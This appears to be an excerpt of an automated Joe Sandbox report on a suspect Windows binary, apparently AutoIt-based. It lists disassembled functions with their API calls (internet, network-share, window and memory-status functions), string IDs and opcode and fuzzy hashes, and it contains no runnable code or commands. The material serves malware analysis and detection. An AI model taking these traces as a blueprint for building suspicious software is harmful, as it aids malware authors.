                                            • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                          • __wcsnicmp.LIBCMT ref: 00467288
                                          • WNetUseConnectionW.MPR(00000000,?,00000000,?,00000000,?,00000000,?), ref: 0046732E
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: Connection__wcsnicmp_wcscpy_wcslen
                                          • String ID: LPT
                                          • API String ID: 3035604524-1350329615
                                          • Opcode ID: df00d6e4b866e053a8717e7cd00b83b505630e9b2d4c108cf88e8e3b58e1c49d
                                          • Instruction ID: cd88b7ab87c5f5a0ce5478f82160e7cdfa8c7cefd9f65e810a8a3337a25aa570
                                          • Opcode Fuzzy Hash: df00d6e4b866e053a8717e7cd00b83b505630e9b2d4c108cf88e8e3b58e1c49d
                                          • Instruction Fuzzy Hash: FB51E675A04204ABDB10DF54CC81FAFB7B5AB84708F10855EF905AB381E778EE85CB99
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: _memmove
                                          • String ID: \$h
                                          • API String ID: 4104443479-677774858
                                          • Opcode ID: a8076df7cf2e4be12816d18a067c44a6d5606508540493043604d0ea2b9ab827
                                          • Instruction ID: de34c7bb2fe7d28e42aef252d9636822906cf09101983ade98a7172327fa6e04
                                          • Opcode Fuzzy Hash: a8076df7cf2e4be12816d18a067c44a6d5606508540493043604d0ea2b9ab827
                                          • Instruction Fuzzy Hash: F551A370E002098FDF18CFA9C980AAEB7F2BFC9304F28826AD405AB345D7389D45CB55
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: _memcmp
                                          • String ID: &
                                          • API String ID: 2931989736-1010288
                                          • Opcode ID: a81d5415846f9cf6a42c700ef8b5aeadd08d018be41d214ef7d3fe054b701e0f
                                          • Instruction ID: 5cd53615f07abd051f481cac668b43ae4088e938354b3ed51608dfeeaf990cc9
                                          • Opcode Fuzzy Hash: a81d5415846f9cf6a42c700ef8b5aeadd08d018be41d214ef7d3fe054b701e0f
                                          • Instruction Fuzzy Hash: EC517BB1A0011A9FDB18CF95D891ABFB7B5FF88300F14915AE815A7344D278AE42CBA4
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: _memmove
                                          • String ID: \
                                          • API String ID: 4104443479-2967466578
                                          • Opcode ID: 59d63d8f709c00c8b633315d640480ed85dcad38184220530ca382b626518ab4
                                          • Instruction ID: e0e732097d18f8f10327b86eac3a97b4532b2e4be511d275227a7a0ca48fbcca
                                          • Opcode Fuzzy Hash: 59d63d8f709c00c8b633315d640480ed85dcad38184220530ca382b626518ab4
                                          • Instruction Fuzzy Hash: 2451C570E002498FEF24CFA9C8902AEFBB2BF95314F28826BD45597385D7395D86CB45
                                          APIs
                                          • _wcslen.LIBCMT ref: 00466825
                                          • InternetCrackUrlW.WININET(?,00000000,?), ref: 0046682F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: CrackInternet_wcslen
                                          • String ID: |
                                          • API String ID: 596671847-2343686810
                                          • Opcode ID: 629f28f3e202f2691df4b53306abf03f6cbb1f7e83fd6186c7c4399916927608
                                          • Instruction ID: c4ea99685e293915e64884ba1c360efc28696701351dc191072b09a6dd262d67
                                          • Opcode Fuzzy Hash: 629f28f3e202f2691df4b53306abf03f6cbb1f7e83fd6186c7c4399916927608
                                          • Instruction Fuzzy Hash: B1415076E10209ABDB00EFA5D881BEEB7B8FF58314F00002AE604A7291D7757916CBE5
                                          APIs
                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 00448446
                                          • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0044845F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: MessageSend
                                          • String ID: '
                                          • API String ID: 3850602802-1997036262
                                          • Opcode ID: 21874a52306f08f821648492a7afc6200e27140433d35547b734f0a4523aa872
                                          • Instruction ID: ddf1801fc3b7a37e921bcadc6f33ff454999d78e89978ed9e0859c1643e2593c
                                          • Opcode Fuzzy Hash: 21874a52306f08f821648492a7afc6200e27140433d35547b734f0a4523aa872
                                          • Instruction Fuzzy Hash: 46418E71A002099FDB04CF98D880AEEB7B5FF59300F14816EED04AB341DB756952CFA5
                                          APIs
                                          • _strlen.LIBCMT ref: 0040F858
                                            • Part of subcall function 0040F880: _memmove.LIBCMT ref: 0040F8C9
                                            • Part of subcall function 0040F880: _memmove.LIBCMT ref: 0040F8E3
                                          • _sprintf.LIBCMT ref: 0040F9AE
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: _memmove$_sprintf_strlen
                                          • String ID: %02X
                                          • API String ID: 1921645428-436463671
                                          • Opcode ID: 767cb60b44986bc828a60f9d0ec6f7d4d26665b5612a1b4657e1e4afb2f114d1
                                          • Instruction ID: e5a937a20bc973e7022889ba35624413ac66f4a4f80aeb0e2d5e31f1d02bff57
                                          • Opcode Fuzzy Hash: 767cb60b44986bc828a60f9d0ec6f7d4d26665b5612a1b4657e1e4afb2f114d1
                                          • Instruction Fuzzy Hash: 3E21287270021436D724B66E8C82FDAB39CAF55744F50007FF501A76C1EABCBA1983AD
                                          APIs
                                          • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0045109A
                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004510A8
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: MessageSend
                                          • String ID: Combobox
                                          • API String ID: 3850602802-2096851135
                                          • Opcode ID: 1b8a1482498e59a9e674e96fd5fabaeacd2ddbb1f8abcd0cc85bd7074ae773d5
                                          • Instruction ID: 528d1b292af097fd122ed4be4541c74d7578eb88e117dd2fe935d7ad7cd5862b
                                          • Opcode Fuzzy Hash: 1b8a1482498e59a9e674e96fd5fabaeacd2ddbb1f8abcd0cc85bd7074ae773d5
                                          • Instruction Fuzzy Hash: 0A21A5716102096BEB10DE68DC85FDB3398EB59734F20431AFA24A72D1D3B9EC958768
                                          APIs
                                          • GetWindowTextLengthW.USER32(00000000), ref: 0045134A
                                          • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0045135A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: LengthMessageSendTextWindow
                                          • String ID: edit
                                          • API String ID: 2978978980-2167791130
                                          • Opcode ID: 458bf78cb5436efb918afa53a1743a3d6784074bbf07c1e17ba5dfdf6e920bd9
                                          • Instruction ID: 5a0e340068a0ba28dc4d1c90c86d8b7761b767731f3a1bde811fb9e5560a91dc
                                          • Opcode Fuzzy Hash: 458bf78cb5436efb918afa53a1743a3d6784074bbf07c1e17ba5dfdf6e920bd9
                                          • Instruction Fuzzy Hash: BB2190761102056BEB108F68D894FEB33ADEB89339F10471AFD64D36E1C279DC458B68
                                          APIs
                                          • Sleep.KERNEL32(00000000), ref: 00476CB0
                                          • GlobalMemoryStatusEx.KERNEL32 ref: 00476CC3
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: GlobalMemorySleepStatus
                                          • String ID: @
                                          • API String ID: 2783356886-2766056989
                                          • Opcode ID: e336f3d3cf010bdb765bf3cd25e4316ec625df5f035adc8ff92848a8f4c166eb
                                          • Instruction ID: 7847cb5f82098321599ebf91c79b9dffd15eff11c36c925ad8cec94a5f412430
                                          • Opcode Fuzzy Hash: e336f3d3cf010bdb765bf3cd25e4316ec625df5f035adc8ff92848a8f4c166eb
                                          • Instruction Fuzzy Hash: 67217130508F0497C211BF6AAC4AB5E7BB8AF84B15F01886DF9C8A14D1DF745528C76F
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: htonsinet_addr
                                          • String ID: 255.255.255.255
                                          • API String ID: 3832099526-2422070025
                                          • Opcode ID: bffbf838f8b6926ef71edb3efae5563a838ccfa537518f0e0f8b175b1623bbd9
                                          • Instruction ID: fb726eff09ff94cff080b531f734a3fd27281744828c6f3d0166551fa69e616e
                                          • Opcode Fuzzy Hash: bffbf838f8b6926ef71edb3efae5563a838ccfa537518f0e0f8b175b1623bbd9
                                          • Instruction Fuzzy Hash: 5211E732600304ABCF10DF69EC85FAA73A8EF45324F04455BF9049B392D635E4518B59
                                          APIs
                                          • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 004425F8
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: InternetOpen
                                          • String ID: <local>
                                          • API String ID: 2038078732-4266983199
                                          • Opcode ID: 84bf365b150010c194f632228c20f1475d6fe654e04a12f862fc2198fde258ef
                                          • Instruction ID: 93d8b03a482712ff69e4757b1f2b0d1c201104d099b6cd2898bf81ba059b6d15
                                          • Opcode Fuzzy Hash: 84bf365b150010c194f632228c20f1475d6fe654e04a12f862fc2198fde258ef
                                          • Instruction Fuzzy Hash: 9311C270680710BAF720CB548E62FBA77E8BB24B01F50844BF9429B6C0D6F4B944D7A9
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: __fread_nolock_memmove
                                          • String ID: EA06
                                          • API String ID: 1988441806-3962188686
                                          • Opcode ID: e45c56eab20c3bcfe4a359df8a9ba3729120cfe0f4e9d091ae644268b7df8977
                                          • Instruction ID: b3ef0f2836274d974f80c1c05754fec17bf4118f678989acdc9742ef3c25ced0
                                          • Opcode Fuzzy Hash: e45c56eab20c3bcfe4a359df8a9ba3729120cfe0f4e9d091ae644268b7df8977
                                          • Instruction Fuzzy Hash: 7D014971904228ABCF18DB99DC56EFEBBF49F55301F00859EF59793281D578A708CBA0
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: _memmove
                                          • String ID: u,D
                                          • API String ID: 4104443479-3858472334
                                          • Opcode ID: a09dc1741948e98e7df597fac067bc9d4c41fa761799cf9fa5b02ea5b7d8fd51
                                          • Instruction ID: 1e149f93898fe9afff494952afced4f728167d7c2cca3c00b97e401526751dc1
                                          • Opcode Fuzzy Hash: a09dc1741948e98e7df597fac067bc9d4c41fa761799cf9fa5b02ea5b7d8fd51
                                          • Instruction Fuzzy Hash: 4FF04C722007045AE3149E6ADC41FD7B7ECDBD8714F50442EF74997241E1B8A9858764
                                          APIs
                                          • SendMessageW.USER32(?,00001001,00000000,?), ref: 004560FE
                                            • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                          • wsprintfW.USER32 ref: 0045612A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: MessageSend_mallocwsprintf
                                          • String ID: %d/%02d/%02d
                                          • API String ID: 1262938277-328681919
                                          • Opcode ID: 0791508f4d5d4d8a4d88f52051df625728301e413c657ab928a68c4181838543
                                          • Instruction ID: 953f6dd97ce98099cbba652085d0304866be84a46252058ffc4865c1a62d2123
                                          • Opcode Fuzzy Hash: 0791508f4d5d4d8a4d88f52051df625728301e413c657ab928a68c4181838543
                                          • Instruction Fuzzy Hash: 9DF0823274022866D7109BD9AD42FBEB3A8DB49762F00416BFE08E9180E6694854C3B9
                                          APIs
                                          • InternetCloseHandle.WININET(?), ref: 00442663
                                          • InternetCloseHandle.WININET ref: 00442668
                                            • Part of subcall function 004319AC: WaitForSingleObject.KERNEL32(aeB,?,?,00442688,aeB,00002710,?,?,00426561,?,?,0040F19D), ref: 004319BD
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: CloseHandleInternet$ObjectSingleWait
                                          • String ID: aeB
                                          • API String ID: 857135153-906807131
                                          • Opcode ID: c8224cb77d174d98af0e1b6511dcd9cd22ae279780c4dc09588970c0e039578a
                                          • Instruction ID: 0fa74210230a71b56b5a48e3a0e63043fcf8dca502afcbd281d0c2380f7acdeb
                                          • Opcode Fuzzy Hash: c8224cb77d174d98af0e1b6511dcd9cd22ae279780c4dc09588970c0e039578a
                                          • Instruction Fuzzy Hash: 46E0E67650071467D310AF9ADC00B4BF7DC9F95724F11482FEA4497650C6B5B4408BA4
                                          APIs
                                          • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00441BFE
                                          • PostMessageW.USER32(00000000), ref: 00441C05
                                            • Part of subcall function 004331A2: Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: FindMessagePostSleepWindow
                                          • String ID: Shell_TrayWnd
                                          • API String ID: 529655941-2988720461
                                          • Opcode ID: 45e518b183cc50fc9cae19d0f51122c68363ee0c98c893ad2541c3bd761d7025
                                          • Instruction ID: aba4e04af0122a293c2d26b46e7c49f9db856b5fc79b6d6ac13cebee95b63d36
                                          • Opcode Fuzzy Hash: 45e518b183cc50fc9cae19d0f51122c68363ee0c98c893ad2541c3bd761d7025
                                          • Instruction Fuzzy Hash: EFD0A772BC13013BFA6077745D0FF8B66145B14711F000C3A7B42E61C1D4F8E4018758
